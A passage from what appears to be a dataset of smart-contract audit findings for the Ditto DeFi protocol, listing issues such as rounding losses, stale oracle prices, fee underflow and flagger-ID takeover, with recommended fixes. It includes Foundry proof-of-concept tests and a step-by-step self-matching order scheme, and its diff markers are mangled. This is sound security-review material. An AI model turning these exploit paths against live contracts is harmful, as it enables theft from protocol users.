Vault.CARBON;\\n } else {\\n vault = s.bridge[bridge].vault;\\n }\\n if (withdrawalFee > 0) {\\n fee = zethAmount.mulU88(withdrawalFee);\\n zethAmount -= fee;\\n s.vaultUser[vault][address(this)].ethEscrowed += fee;\\n }\\n uint88 ethAmount = _ethConversion(vault, zethAmount);\\n vault.removeZeth(zethAmount, fee);\\n IBridge(bridge).withdraw(msg.sender, ethAmount);\\n emit Events.Withdraw(bridge, msg.sender, zethAmount, fee);\\n }\\n// rest of code\\n function _ethConversion(uint256 vault, uint88 amount) private view returns (uint88) {\\n uint256 zethTotalNew = vault.getZethTotal();\\n uint88 zethTotal = s.vault[vault].zethTotal;\\n if (zethTotalNew >= zethTotal) {\\n // when yield is positive 1 zeth = 1 eth\\n return amount;\\n } else {\\n // negative yield means 1 zeth < 1 eth\\n return amount.mulU88(zethTotalNew).divU88(zethTotal);\\n }\\n }\\n```\\n" +Division before multiplication results in lower `dittoMatchedShares` distributed to users,medium,"Shares amount is rounded down to number of days staked. Max truncation is 1 day, min time is 14 days. At most 1 / 14 * 100% = 7.1% of accrued shares will be truncated.\\nDivision before multiplication\\n```\\n uint88 shares = eth * (timeTillMatch / 1 days);\\n```\\n\\nSuppose `timeTillMatch = 14.99 days`, `eth = 1e18`. Expected result is `14.99 * 1e18 / 1 = 14.99e18 shares`. Actual result is `1e18 * (14.99 / 1) = 14e18 shares`",```\\n- uint88 shares = eth * (timeTillMatch / 1 days);\\n+ uint88 shares = uint88(uint256(eth * timeTillMatch) / 1 days);\\n```\\n,Up to 7.1% of user's shares will be truncated,```\\n uint88 shares = eth * (timeTillMatch / 1 days);\\n```\\n +Using a cached price in the critical shutdownMarket(),medium,"The `MarketShutdownFacet::shutdownMarket()` is a critical function allowing anyone to freeze the market permanently. 
The function determines whether or not the market will be frozen based on the asset collateral ratio calculated from a cached price, which can be outdated (too risky for this critical function).\\nOnce the market is frozen, no one can unfreeze it.\\nThe `shutdownMarket()` allows anyone to call to freeze the market permanently when the asset collateral ratio threshold (default of 1.1 ether) has been reached. Once the market is frozen, all shorters will lose access to their positions. Even the protocol's DAO or admin cannot unfreeze the market. Therefore, the `shutdownMarket()` becomes one of the most critical functions.\\nTo calculate the asset collateral ratio (cRatio), the `shutdownMarket()` executes the `_getAssetCollateralRatio()`. However, the `_getAssetCollateralRatio()` calculates the `cRatio` using the cached price loaded from the `LibOracle::getPrice()`.\\nUsing the cached price in a critical function like `shutdownMarket()` is too risky, as the cached price can be outdated. The function should consider only a fresh price queried from Chainlink.\\n```\\n function shutdownMarket(address asset)\\n external\\n onlyValidAsset(asset)\\n isNotFrozen(asset)\\n nonReentrant\\n {\\n uint256 cRatio = _getAssetCollateralRatio(asset);\\n if (cRatio > LibAsset.minimumCR(asset)) {\\n revert Errors.SufficientCollateral();\\n } else {\\n STypes.Asset storage Asset = s.asset[asset];\\n uint256 vault = Asset.vault;\\n uint88 assetZethCollateral = Asset.zethCollateral;\\n s.vault[vault].zethCollateral -= assetZethCollateral;\\n Asset.frozen = F.Permanent;\\n if (cRatio > 1 ether) {\\n // More than enough collateral to redeem ERC 1:1, send extras to TAPP\\n uint88 excessZeth =\\n assetZethCollateral - assetZethCollateral.divU88(cRatio);\\n s.vaultUser[vault][address(this)].ethEscrowed += excessZeth;\\n // Reduces c-ratio to 1\\n Asset.zethCollateral -= excessZeth;\\n }\\n }\\n emit Events.ShutdownMarket(asset);\\n }\\n\\n // rest of code\\n\\n function 
_getAssetCollateralRatio(address asset)\\n private\\n view\\n returns (uint256 cRatio)\\n {\\n STypes.Asset storage Asset = s.asset[asset];\\n return Asset.zethCollateral.div(LibOracle.getPrice(asset).mul(Asset.ercDebt));\\n }\\n```\\n\\nhttps://github.com/Cyfrin/2023-09-ditto/blob/a93b4276420a092913f43169a353a6198d3c21b9/contracts/facets/MarketShutdownFacet.sol#L36\\nhttps://github.com/Cyfrin/2023-09-ditto/blob/a93b4276420a092913f43169a353a6198d3c21b9/contracts/facets/MarketShutdownFacet.sol#L37\\nhttps://github.com/Cyfrin/2023-09-ditto/blob/a93b4276420a092913f43169a353a6198d3c21b9/contracts/facets/MarketShutdownFacet.sol#L44\\nhttps://github.com/Cyfrin/2023-09-ditto/blob/a93b4276420a092913f43169a353a6198d3c21b9/contracts/facets/MarketShutdownFacet.sol#L99","Using a cached price in the critical shutdownMarket()\\nThe `shutdownMarket()` requires the most accurate price, not just a cached price. Execute the `LibOracle::getOraclePrice()` to get the accurate price from Chainlink.","Using the cached price in a critical function like `shutdownMarket()` is too risky, as the cached price can be outdated.\\nOnce the market is frozen, all shorters will lose access to their positions. 
Even the protocol's DAO or admin cannot unfreeze the market.","```\\n function shutdownMarket(address asset)\\n external\\n onlyValidAsset(asset)\\n isNotFrozen(asset)\\n nonReentrant\\n {\\n uint256 cRatio = _getAssetCollateralRatio(asset);\\n if (cRatio > LibAsset.minimumCR(asset)) {\\n revert Errors.SufficientCollateral();\\n } else {\\n STypes.Asset storage Asset = s.asset[asset];\\n uint256 vault = Asset.vault;\\n uint88 assetZethCollateral = Asset.zethCollateral;\\n s.vault[vault].zethCollateral -= assetZethCollateral;\\n Asset.frozen = F.Permanent;\\n if (cRatio > 1 ether) {\\n // More than enough collateral to redeem ERC 1:1, send extras to TAPP\\n uint88 excessZeth =\\n assetZethCollateral - assetZethCollateral.divU88(cRatio);\\n s.vaultUser[vault][address(this)].ethEscrowed += excessZeth;\\n // Reduces c-ratio to 1\\n Asset.zethCollateral -= excessZeth;\\n }\\n }\\n emit Events.ShutdownMarket(asset);\\n }\\n\\n // rest of code\\n\\n function _getAssetCollateralRatio(address asset)\\n private\\n view\\n returns (uint256 cRatio)\\n {\\n STypes.Asset storage Asset = s.asset[asset];\\n return Asset.zethCollateral.div(LibOracle.getPrice(asset).mul(Asset.ercDebt));\\n }\\n```\\n" +Malicious trader can intentionally obtain `dittoMatchedShares` in some edges cases,low,"Malicious trader can intentionally obtain `dittoMatchedShares` by creating a bid order using a low price that nobody will ask, then wait for more than 14 days and the same malicious trader create an ask order using the same bid's low price causing the increase of `dittoMatchedShares`.\\nMalicious trader can create a bid order using the BidOrdersFacet::createBid() function at very low price, then the same malicious trader can wait some days until the minumum required in order to get `dittoMatchedShares` and set a `ask` order using the bid's low price. 
Please consider the next scenario:\\n```\\nMarket status:\\nassetX: current price 100\\n```\\n\\nMalicious trader creates the `bid order` for the `assetX` using the `price: 10` (low price compared to the current 100 price) and `ercAmount 10`. The low price is because nobody wants to sell at that price so the order can stay there without being matched.\\nThe `bid order` will be submitted to the order book because there are not `asks/sells` to fill at that price.\\nMalicious trader waits for more than 14 days. Additionally the malicious trader needs to wait until there are not `asks/sells` in the order book.\\nOnce the step 3 is ok, the Malicious trader creates the `ask order` at `price 10 and ercAmount10` (the bid's order price from step 1). The order is matched with the `bid order` from the step 1 and `dittoMatchedShares` are assigned to the malicious trader.\\nIt is a very edge case because the malicious trader needs an empty `ask/sells` orderbook so he can put his own `ask order` at the malicious bid order price but in conditions where the asset is not very traded the malicious actor can benefit from this.",Verify that the address from the `bid order` is not the same address who is creating the `ask` order.,"Malicious actor can intentionally obtain `dittoMatchedShares` using `bid/asks` orders that he intentionally crafts. 
The `bid/ask` orders are created by the same malicious actor, so he won't lose assets.\\nTools used\\nManual review",```\\nMarket status:\\nassetX: current price 100\\n```\\n +Primary liquidation fee distribution may revert due to the inability to cover the caller fees,medium,"Fee distribution during the primary short liquidation may revert due to an arithmetic underflow error in case the TAPP's escrowed ETH balance is insufficient to cover the caller (liquidator) fees.\\nDuring the primary liquidation, the `_marginFeeHandler` function called in line 126 handles the fee distribution for the liquidator (i.e., caller).\\nIf the eligible caller fee (callerFee) is less or equal to the ETH escrowed by the TAPP, the fee is deducted from `TAPP.ethEscrowed` and added to the liquidators escrowed ETH balance, `VaultUser.ethEscrowed`, in lines 271-274.\\nOtherwise, if the TAPP's escrowed ETH is insufficient to cover the caller fees, i.e., the `else` branch in line 274, the caller is given the `tappFee` instead of `gasFee`.\\nHowever, if `m.totalFee` exceeds the TAPP's `ethEscrowed`, it reverts with an arithmetic underflow error in line 278. This can be the case if the TAPP has little to no ETH escrowed after placing the forced bid as part of the liquidation, attempting to buy the debt token amount required to repay the short position's debt. 
In case the short's collateral is not sufficient to buy the debt tokens, the TAPP's escrowed ETH is utilized as well, potentially depleting the TAPP's escrowed ETH.\\nConsequently, the remaining `TAPP.ethEscrowed` is potentially lower than the calculated `m.totalFee`, resulting in the arithmetic underflow error in line 278.\\ncontracts/facets/MarginCallPrimaryFacet.sol#L278\\n```\\nfunction _marginFeeHandler(MTypes.MarginCallPrimary memory m) private {\\n STypes.VaultUser storage VaultUser = s.vaultUser[m.vault][msg.sender];\\n STypes.VaultUser storage TAPP = s.vaultUser[m.vault][address(this)];\\n // distribute fees to TAPP and caller\\n uint88 tappFee = m.ethFilled.mulU88(m.tappFeePct);\\n uint88 callerFee = m.ethFilled.mulU88(m.callerFeePct) + m.gasFee;\\n m.totalFee += tappFee + callerFee;\\n //@dev TAPP already received the gasFee for being the forcedBid caller. tappFee nets out.\\n if (TAPP.ethEscrowed >= callerFee) {\\n TAPP.ethEscrowed -= callerFee;\\n VaultUser.ethEscrowed += callerFee;\\n } else {\\n // Give caller (portion of?) 
tappFee instead of gasFee\\n VaultUser.ethEscrowed += callerFee - m.gasFee + tappFee;\\n m.totalFee -= m.gasFee;\\n❌ TAPP.ethEscrowed -= m.totalFee;\\n }\\n}\\n```\\n","Primary liquidation fee distribution may revert due to the inability to cover the caller fees\\nConsider checking if the TAPP's `ethEscrowed` is sufficient to cover the `m.totalFee` before deducting the fee from the TAPP's `ethEscrowed` balance and if not, give the caller the TAPP's `ethEscrowed` balance.","The primary short liquidation fails, requiring to wait until the short position's collateral is sufficient to buy the debt tokens or the TAPP has sufficient collateral, or, if the short's collateral ratio further decreases, the short position is liquidated via the secondary liquidation (which adds additional risk to the peg of the asset as the overall collateral ratio could fall below 100%).",```\\nfunction _marginFeeHandler(MTypes.MarginCallPrimary memory m) private {\\n STypes.VaultUser storage VaultUser = s.vaultUser[m.vault][msg.sender];\\n STypes.VaultUser storage TAPP = s.vaultUser[m.vault][address(this)];\\n // distribute fees to TAPP and caller\\n uint88 tappFee = m.ethFilled.mulU88(m.tappFeePct);\\n uint88 callerFee = m.ethFilled.mulU88(m.callerFeePct) + m.gasFee;\\n m.totalFee += tappFee + callerFee;\\n //@dev TAPP already received the gasFee for being the forcedBid caller. tappFee nets out.\\n if (TAPP.ethEscrowed >= callerFee) {\\n TAPP.ethEscrowed -= callerFee;\\n VaultUser.ethEscrowed += callerFee;\\n } else {\\n // Give caller (portion of?) 
tappFee instead of gasFee\\n VaultUser.ethEscrowed += callerFee - m.gasFee + tappFee;\\n m.totalFee -= m.gasFee;\\n❌ TAPP.ethEscrowed -= m.totalFee;\\n }\\n}\\n```\\n +Flag can be overriden by another user,high,"The `setFlagger` function allows a new flagger to reuse `flaggerHint` flag id after `LibAsset.firstLiquidationTime` has passed after flagId has been updated.\\n```\\n function setFlagger(\\n STypes.ShortRecord storage short,\\n address cusd,\\n uint16 flaggerHint\\n ) internal {\\n\\n if (flagStorage.g_flaggerId == 0) {\\n address flaggerToReplace = s.flagMapping[flaggerHint];\\n\\n // @audit if timeDiff > firstLiquidationTime, replace the flagger address\\n\\n uint256 timeDiff = flaggerToReplace != address(0)\\n ? LibOrders.getOffsetTimeHours()\\n - s.assetUser[cusd][flaggerToReplace].g_updatedAt\\n : 0;\\n //@dev re-use an inactive flaggerId\\n if (timeDiff > LibAsset.firstLiquidationTime(cusd)) {\\n delete s.assetUser[cusd][flaggerToReplace].g_flaggerId;\\n short.flaggerId = flagStorage.g_flaggerId = flaggerHint;\\n\\n // more code\\n\\n s.flagMapping[short.flaggerId] = msg.sender;\\n```\\n\\nhttps://github.com/Cyfrin/2023-09-ditto/blob/a93b4276420a092913f43169a353a6198d3c21b9/contracts/libraries/LibShortRecord.sol#L377-L404C13\\nSince the previous flagger can only liquidate the flagged short after `LibAsset.firstLiquidationTime` has passed, the flagged short will be unliquidated till that time. Both the ability to flag the short for first flagger and the ability to replace the first flagger starts at the same instant. 
This allows a new flagger to take control over the liquidation of the flagged short by finding some other liquidatable short and passing in the flagId of the previous flagger as the `flagHint`.\\nPOC Test\\n```\\ndiff --git a/test/MarginCallFlagShort.t.sol b/test/MarginCallFlagShort.t.sol\\nindex 906657e..3d7f985 100644\\n--- a/test/MarginCallFlagShort.t.sol\\n// Add the line below\\n// Add the line below\\n// Add the line below\\n b/test/MarginCallFlagShort.t.sol\\n@@ -169,6 // Add the line below\\n169,90 @@ contract MarginCallFlagShortTest is MarginCallHelper {\\n assertEq(diamond.getFlagger(shortRecord.flaggerId), extra);\\n }\\n \\n// Add the line below\\n function test_FlaggerId_Override_Before_Call() public {\\n// Add the line below\\n address flagger1 = address(77);\\n// Add the line below\\n address flagger2 = address(78);\\n// Add the line below\\n\\n// Add the line below\\n vm.label(flagger1, ""flagger1"");\\n// Add the line below\\n vm.label(flagger2, ""flagger2"");\\n// Add the line below\\n\\n// Add the line below\\n //create first short\\n// Add the line below\\n fundLimitBidOpt(DEFAULT_PRICE, DEFAULT_AMOUNT, receiver);\\n// Add the line below\\n fundLimitShortOpt(DEFAULT_PRICE, DEFAULT_AMOUNT, sender);\\n// Add the line below\\n STypes.ShortRecord memory shortRecord1 =\\n// Add the line below\\n diamond.getShortRecord(asset, sender, Constants.SHORT_STARTING_ID);\\n// Add the line below\\n\\n// Add the line below\\n assertEq(diamond.getFlaggerIdCounter(), 1);\\n// Add the line below\\n assertEq(shortRecord1.flaggerId, 0);\\n// Add the line below\\n assertEq(diamond.getFlagger(shortRecord1.flaggerId), address(0));\\n// Add the line below\\n\\n// Add the line below\\n //flag first short\\n// Add the line below\\n setETH(2500 ether);\\n// Add the line below\\n vm.prank(flagger1);\\n// Add the line below\\n diamond.flagShort(asset, sender, shortRecord1.id, Constants.HEAD);\\n// Add the line below\\n shortRecord1 = diamond.getShortRecord(asset, sender, 
shortRecord1.id);\\n// Add the line below\\n\\n// Add the line below\\n assertEq(diamond.getFlaggerIdCounter(), 2);\\n// Add the line below\\n assertEq(shortRecord1.flaggerId, 1);\\n// Add the line below\\n assertEq(diamond.getFlagger(shortRecord1.flaggerId), flagger1);\\n// Add the line below\\n\\n// Add the line below\\n skip(TEN_HRS_PLUS);\\n// Add the line below\\n setETH(2500 ether);\\n// Add the line below\\n\\n// Add the line below\\n //attempting direct liquidation by flagger2 fails since only allowed to flagger1\\n// Add the line below\\n\\n// Add the line below\\n //add ask order to liquidate against\\n// Add the line below\\n fundLimitAskOpt(DEFAULT_PRICE, DEFAULT_AMOUNT, receiver);\\n// Add the line below\\n\\n// Add the line below\\n uint16[] memory shortHintArray = setShortHintArray();\\n// Add the line below\\n vm.prank(flagger2);\\n// Add the line below\\n vm.expectRevert(Errors.MarginCallIneligibleWindow.selector);\\n// Add the line below\\n diamond.liquidate(asset, sender, shortRecord1.id, shortHintArray);\\n// Add the line below\\n\\n// Add the line below\\n //cancel the previously created ask order\\n// Add the line below\\n fundLimitBidOpt(DEFAULT_PRICE, DEFAULT_AMOUNT, receiver);\\n// Add the line below\\n\\n// Add the line below\\n //reset\\n// Add the line below\\n setETH(4000 ether);\\n// Add the line below\\n\\n// Add the line below\\n //create another short\\n// Add the line below\\n fundLimitBidOpt(DEFAULT_PRICE, DEFAULT_AMOUNT, receiver);\\n// Add the line below\\n fundLimitShortOpt(DEFAULT_PRICE, DEFAULT_AMOUNT, sender);\\n// Add the line below\\n STypes.ShortRecord memory shortRecord2 =\\n// Add the line below\\n diamond.getShortRecord(asset, sender, Constants.SHORT_STARTING_ID // Add the line below\\n 1);\\n// Add the line below\\n\\n// Add the line below\\n assertEq(diamond.getFlaggerIdCounter(), 2);\\n// Add the line below\\n assertEq(shortRecord2.flaggerId, 0);\\n// Add the line below\\n 
assertEq(diamond.getFlagger(shortRecord2.flaggerId), address(0));\\n// Add the line below\\n\\n// Add the line below\\n //flag second short by providing flagger id of flagger1. this resets the flagger id\\n// Add the line below\\n setETH(2500 ether);\\n// Add the line below\\n vm.prank(flagger2);\\n// Add the line below\\n diamond.flagShort(\\n// Add the line below\\n asset, sender, Constants.SHORT_STARTING_ID // Add the line below\\n 1, uint16(shortRecord1.flaggerId)\\n// Add the line below\\n );\\n// Add the line below\\n shortRecord2 =\\n// Add the line below\\n diamond.getShortRecord(asset, sender, Constants.SHORT_STARTING_ID // Add the line below\\n 1);\\n// Add the line below\\n\\n// Add the line below\\n //flagger1 has been replaced\\n// Add the line below\\n assertEq(diamond.getFlaggerIdCounter(), 2);\\n// Add the line below\\n assertEq(shortRecord2.flaggerId, 1);\\n// Add the line below\\n assertEq(diamond.getFlagger(shortRecord2.flaggerId), flagger2);\\n// Add the line below\\n assertEq(diamond.getFlagger(shortRecord1.flaggerId), flagger2);\\n// Add the line below\\n\\n// Add the line below\\n //ask to liquidate against\\n// Add the line below\\n fundLimitAskOpt(DEFAULT_PRICE, DEFAULT_AMOUNT, receiver);\\n// Add the line below\\n\\n// Add the line below\\n //now flagger1 cannot liquidate shortRecord1\\n// Add the line below\\n vm.prank(flagger1);\\n// Add the line below\\n vm.expectRevert(Errors.MarginCallIneligibleWindow.selector);\\n// Add the line below\\n diamond.liquidate(asset, sender, shortRecord1.id, shortHintArray);\\n// Add the line below\\n\\n// Add the line below\\n //but flagger1 can\\n// Add the line below\\n vm.prank(flagger2);\\n// Add the line below\\n diamond.liquidate(asset, sender, shortRecord1.id, shortHintArray);\\n// Add the line below\\n }\\n// Add the line below\\n\\n function test_FlagShort_FlaggerId_Recycling_AfterIncreaseCollateral() public {\\n createAndFlagShort();\\n \\n```\\n","Update the check to 
`secondLiquidationTime`\\n```\\ndiff // Remove the line below\\n// Remove the line below\\ngit a/contracts/libraries/LibShortRecord.sol b/contracts/libraries/LibShortRecord.sol\\nindex 7c5ecc3..c8736b0 100644\\n// Remove the line below\\n// Remove the line below\\n// Remove the line below\\n a/contracts/libraries/LibShortRecord.sol\\n// Add the line below\\n// Add the line below\\n// Add the line below\\n b/contracts/libraries/LibShortRecord.sol\\n@@ // Remove the line below\\n391,7 // Add the line below\\n391,7 @@ library LibShortRecord {\\n // Remove the line below\\n s.assetUser[cusd][flaggerToReplace].g_updatedAt\\n : 0;\\n //@dev re// Remove the line below\\nuse an inactive flaggerId\\n// Remove the line below\\n if (timeDiff > LibAsset.firstLiquidationTime(cusd)) {\\n// Add the line below\\n if (timeDiff > LibAsset.secondLiquidationTime(cusd)) {\\n delete s.assetUser[cusd][flaggerToReplace].g_flaggerId;\\n short.flaggerId = flagStorage.g_flaggerId = flaggerHint;\\n } else if (s.flaggerIdCounter < type(uint16).max) {\\n```\\n",First flagger will be in loss of the spent gas and expected reward.,"```\\n function setFlagger(\\n STypes.ShortRecord storage short,\\n address cusd,\\n uint16 flaggerHint\\n ) internal {\\n\\n if (flagStorage.g_flaggerId == 0) {\\n address flaggerToReplace = s.flagMapping[flaggerHint];\\n\\n // @audit if timeDiff > firstLiquidationTime, replace the flagger address\\n\\n uint256 timeDiff = flaggerToReplace != address(0)\\n ? 
LibOrders.getOffsetTimeHours()\\n - s.assetUser[cusd][flaggerToReplace].g_updatedAt\\n : 0;\\n //@dev re-use an inactive flaggerId\\n if (timeDiff > LibAsset.firstLiquidationTime(cusd)) {\\n delete s.assetUser[cusd][flaggerToReplace].g_flaggerId;\\n short.flaggerId = flagStorage.g_flaggerId = flaggerHint;\\n\\n // more code\\n\\n s.flagMapping[short.flaggerId] = msg.sender;\\n```\\n" +Combining shorts can incorrectly reset the shorts flag,medium,"The protocol allows users to combine multiple short positions into one as long as the combined short stays above the primary collateral ratio. The function is also able to reset an active flag from any of the combined shorts if the final ratio is above the primaryLiquidationCR.\\nThe issue is that the combineShorts function does not call updateErcDebt, which is called in every other function that is able to reset a shorts flag. This means that if the debt is outdated the final combined short could incorrectly reset the flag putting the position on a healthy ratio when it really isn't. This would also mean that it will have to be reflagged and go through the timer again before it can be liquidated.\\nThe combine shorts function merges all short records into the short at position id[0]. 
Focusing on the debt aspect it adds up the total debt and calculates the ercDebtSocialized of all positions except for the first.\\n```\\n {\\n uint88 currentShortCollateral = currentShort.collateral;\\n uint88 currentShortErcDebt = currentShort.ercDebt;\\n collateral += currentShortCollateral;\\n ercDebt += currentShortErcDebt;\\n yield += currentShortCollateral.mul(currentShort.zethYieldRate);\\n ercDebtSocialized += currentShortErcDebt.mul(currentShort.ercDebtRate);\\n }\\n```\\n\\nIt then merges this total to the first position using the merge function and this will give us the combined short.\\n```\\n// Merge all short records into the short at position id[0]\\n firstShort.merge(ercDebt, ercDebtSocialized, collateral, yield, c.shortUpdatedAt);\\n```\\n\\nFinally we check if the position had an active flag and if it did, we check if the new combined short is in a healthy enough state to reset the flag, if not the whole function reverts.\\n```\\n // If at least one short was flagged, ensure resulting c-ratio > primaryLiquidationCR\\n if (c.shortFlagExists) {\\n if (\\n firstShort.getCollateralRatioSpotPrice(\\n LibOracle.getSavedOrSpotOraclePrice(_asset)\\n ) < LibAsset.primaryLiquidationCR(_asset)\\n ) revert Errors.InsufficientCollateral();\\n // Resulting combined short has sufficient c-ratio to remove flag\\n firstShort.resetFlag();\\n }\\n```\\n\\nAs you can see the updateErcDebt function is not called anywhere in the function meaning the flag could be reset with outdated values.","Call updateErcDebt on the short once it is combined in the combineShorts function to ensure the collateral ratio is calculated with the most up to date values.\\n```\\n function combineShorts(address asset, uint8[] memory ids)\\n external\\n isNotFrozen(asset)\\n nonReentrant\\n onlyValidShortRecord(asset, msg.sender, ids[0])\\n {\\n // Initial code\\n\\n // Merge all short records into the short at position id[0]\\n firstShort.merge(ercDebt, ercDebtSocialized, collateral, yield, 
c.shortUpdatedAt);\\n\\n firstShort.updateErcDebt(asset); // update debt here before checking flag\\n\\n // If at least one short was flagged, ensure resulting c-ratio > primaryLiquidationCR\\n if (c.shortFlagExists) {\\n if (\\n firstShort.getCollateralRatioSpotPrice(\\n LibOracle.getSavedOrSpotOraclePrice(_asset)\\n ) < LibAsset.primaryLiquidationCR(_asset)\\n ) revert Errors.InsufficientCollateral();\\n // Resulting combined short has sufficient c-ratio to remove flag\\n firstShort.resetFlag();\\n }\\n emit Events.CombineShorts(asset, msg.sender, ids);\\n }\\n```\\n",A short could have its flag incorrectly reset and reset the timer. This is not good for the protocol as it will have a unhealthy short for a longer time.,```\\n {\\n uint88 currentShortCollateral = currentShort.collateral;\\n uint88 currentShortErcDebt = currentShort.ercDebt;\\n collateral += currentShortCollateral;\\n ercDebt += currentShortErcDebt;\\n yield += currentShortCollateral.mul(currentShort.zethYieldRate);\\n ercDebtSocialized += currentShortErcDebt.mul(currentShort.ercDebtRate);\\n }\\n```\\n +Event in secondaryLiquidation could be misused to show false liquidations,low,"The `liquidateSecondary` function in the protocol is designed to emit events detailing the specifics of liquidation, which can be crucial for other protocols or front-end integrations that track secondary liquidations within the protocol. One of the values emitted is `batches`, which indicates which positions got liquidated. However the function emits the `batches` array as it initially receives it, even though it may skip positions that are not eligible for liquidation during its execution. 
This implies that the emitted event could represent incorrect data, indicating positions as liquidated even if they were not, due to their ineligibility.\\n```\\nfunction liquidateSecondary(\\n address asset,\\n MTypes.BatchMC[] memory batches,\\n uint88 liquidateAmount,\\n bool isWallet\\n ) external onlyValidAsset(asset) isNotFrozen(asset) nonReentrant {\\n // Initial code\\n\\n emit Events.LiquidateSecondary(asset, batches, msg.sender, isWallet);\\n }\\n```\\n","Event in secondaryLiquidation could be misused to show false liquidations\\nModify the `batches` array before emitting it in the event, ensuring it accurately reflects the positions that were actually liquidated.","This inconsistency in the emitted event data can lead to incorrect data, indicating positions as liquidated even if they were not.","```\\nfunction liquidateSecondary(\\n address asset,\\n MTypes.BatchMC[] memory batches,\\n uint88 liquidateAmount,\\n bool isWallet\\n ) external onlyValidAsset(asset) isNotFrozen(asset) nonReentrant {\\n // Initial code\\n\\n emit Events.LiquidateSecondary(asset, batches, msg.sender, isWallet);\\n }\\n```\\n" +`Errors.InvalidTwapPrice()` is never invoked when `if (twapPriceInEther == 0)` is true,low,"The protocol expects to `revert` with `Errors.InvalidTwapPrice()` when twapPriceInEther == 0:\\n```\\nFile: contracts/libraries/LibOracle.sol\\n\\n85 uint256 twapPriceInEther = (twapPrice / Constants.DECIMAL_USDC) * 1 ether;\\n86 uint256 twapPriceInv = twapPriceInEther.inv();\\n87 if (twapPriceInEther == 0) {\\n88 revert Errors.InvalidTwapPrice(); // @audit : unreachable code\\n89 }\\n```\\n\\nHowever, the control never reaches Line 88 when `twapPriceInEther` is zero. 
It rather reverts before that with error `Division or modulo by 0`.\\nNOTE: Due to this bug, `Errors.InvalidTwapPrice()` is never invoked/thrown by the protocol even under satisfactory conditions, even though it has been defined.\\nSince I could not find any helper function inside `contracts/` or `test/` which lets one set the `twapPrice` returned by uint256 `twapPrice` = IDiamond(payable(address(this))).estimateWETHInUSDC(Constants.UNISWAP_WETH_BASE_AMT, 30 minutes); to zero for testing purposes, I have created a simplified PoC which targets the problem area:\\nSave the following as a file named `test/InvalidTwapPriceErrorCheck.t.sol` and run the test via `forge test --mt testInvalidTwapPriceErrNeverInvoked -vv`. You will find that the test reverts with error `Division or modulo by 0`, but not with `Errors.InvalidTwapPrice()`. The PoC uses the same underlying math libraries and logic path as the protocol does in `contracts/libraries/LibOracle.sol::baseOracleCircuitBreaker()`.\\n```\\n// SPDX-License-Identifier: GPL-3.0-only\\npragma solidity 0.8.21;\\n\\nimport {Constants} from ""contracts/libraries/Constants.sol"";\\nimport {Errors} from ""contracts/libraries/Errors.sol"";\\nimport {U256} from ""contracts/libraries/PRBMathHelper.sol"";\\nimport {OBFixture} from ""test/utils/OBFixture.sol"";\\n\\ncontract InvalidTwapPriceErrorCheck is OBFixture {\\n using U256 for uint256;\\n\\n function getZeroTwapPriceInEther_IncorrectStyle_As_In_Existing_DittoProtocol()\\n internal\\n pure\\n returns (uint256 twapPriceInEther, uint256 twapPriceInv)\\n {\\n // fake the twapPrice to 0\\n uint256 twapPrice = 0; // IDiamond(payable(address(this))).estimateWETHInUSDC(Constants.UNISWAP_WETH_BASE_AMT, 30 minutes);\\n // Following code is copied as-is from\\n // `contracts/libraries/LibOracle.sol::baseOracleCircuitBreaker()#L85-L89`\\n twapPriceInEther = (twapPrice / Constants.DECIMAL_USDC) * 1 ether;\\n twapPriceInv = twapPriceInEther.inv();\\n if (twapPriceInEther == 0) {\\n revert 
Errors.InvalidTwapPrice(); // @audit : unreachable code\\n }\\n }\\n\\n function getZeroTwapPriceInEther_CorrectStyle()\\n internal\\n pure\\n returns (uint256 twapPriceInEther, uint256 twapPriceInv)\\n {\\n // fake the twapPrice to 0\\n uint256 twapPrice = 0; // IDiamond(payable(address(this))).estimateWETHInUSDC(Constants.UNISWAP_WETH_BASE_AMT, 30 minutes);\\n twapPriceInEther = (twapPrice / Constants.DECIMAL_USDC) * 1 ether;\\n if (twapPriceInEther == 0) { \\n revert Errors.InvalidTwapPrice();\\n }\\n twapPriceInv = twapPriceInEther.inv();\\n }\\n\\n function testInvalidTwapPriceErrNeverInvoked() public pure {\\n getZeroTwapPriceInEther_IncorrectStyle_As_In_Existing_DittoProtocol();\\n }\\n\\n function testInvalidTwapPriceErrInvokedCorrectly() public {\\n vm.expectRevert(Errors.InvalidTwapPrice.selector);\\n getZeroTwapPriceInEther_CorrectStyle();\\n }\\n}\\n```\\n\\n\\nIn the above test file, you can also run the test which invokes the ""fixed"" or ""correct"" code style via `forge test --mt testInvalidTwapPriceErrInvokedCorrectly -vv`. 
This will invoke the `Errors.InvalidTwapPrice` error, as expected.",The check on Line 87 (if condition) needs to be performed immediately after Line 85.\\n```\\n 85 uint256 twapPriceInEther = (twapPrice / Constants.DECIMAL_USDC) * 1 ether;\\n// Add the line below\\n 86 if (twapPriceInEther == 0) {\\n// Add the line below\\n 87 revert Errors.InvalidTwapPrice();\\n// Add the line below\\n 88 }\\n// Add the line below\\n 89 uint256 twapPriceInv = twapPriceInEther.inv();\\n// Remove the line below\\n 86 uint256 twapPriceInv = twapPriceInEther.inv();\\n// Remove the line below\\n 87 if (twapPriceInEther == 0) {\\n// Remove the line below\\n 88 revert Errors.InvalidTwapPrice();\\n// Remove the line below\\n 89 }\\n```\\n\\nThe above fix needed to be done because the `inv()` call caused a revert even before control used to reach the `if` condition.,Protocol owner or developer monitoring for a revert due to `Errors.InvalidTwapPrice()` in the logs will never see it and will make debugging & issue resolution harder.,```\\nFile: contracts/libraries/LibOracle.sol\\n\\n85 uint256 twapPriceInEther = (twapPrice / Constants.DECIMAL_USDC) * 1 ether;\\n86 uint256 twapPriceInv = twapPriceInEther.inv();\\n87 if (twapPriceInEther == 0) {\\n88 revert Errors.InvalidTwapPrice(); // @audit : unreachable code\\n89 }\\n```\\n +Rounding-up of user's `cRatio` causes loss for the protocol,medium,"At multiple places in the code, user's collateral ratio has been calculated in a manner which causes loss of precision (rounding-up) due to division before multiplication. 
